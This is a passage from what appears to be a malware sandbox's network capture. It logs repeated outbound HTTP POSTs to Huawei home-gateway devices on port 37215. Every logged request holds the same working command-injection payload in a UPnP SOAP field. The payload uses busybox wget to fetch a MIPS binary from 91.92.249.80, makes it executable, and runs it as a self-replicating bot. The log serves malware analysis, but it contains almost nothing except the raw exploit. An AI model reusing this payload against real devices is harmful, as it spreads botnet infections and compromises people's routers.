                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          90192.168.2.235839641.155.61.9937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124684095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          91192.168.2.2360200157.207.244.13837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124685049 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          92192.168.2.2356646197.208.93.8037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124694109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          93192.168.2.2347048197.17.216.16037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125271082 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          94192.168.2.233479841.142.63.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125273943 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          95192.168.2.234059441.169.112.2937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125274897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          96192.168.2.2348956197.150.35.5737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125361919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          97192.168.2.234082673.13.32.6537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125483036 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          98192.168.2.2347828157.209.164.1937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125550985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          99192.168.2.2357046197.210.134.3337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125586033 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
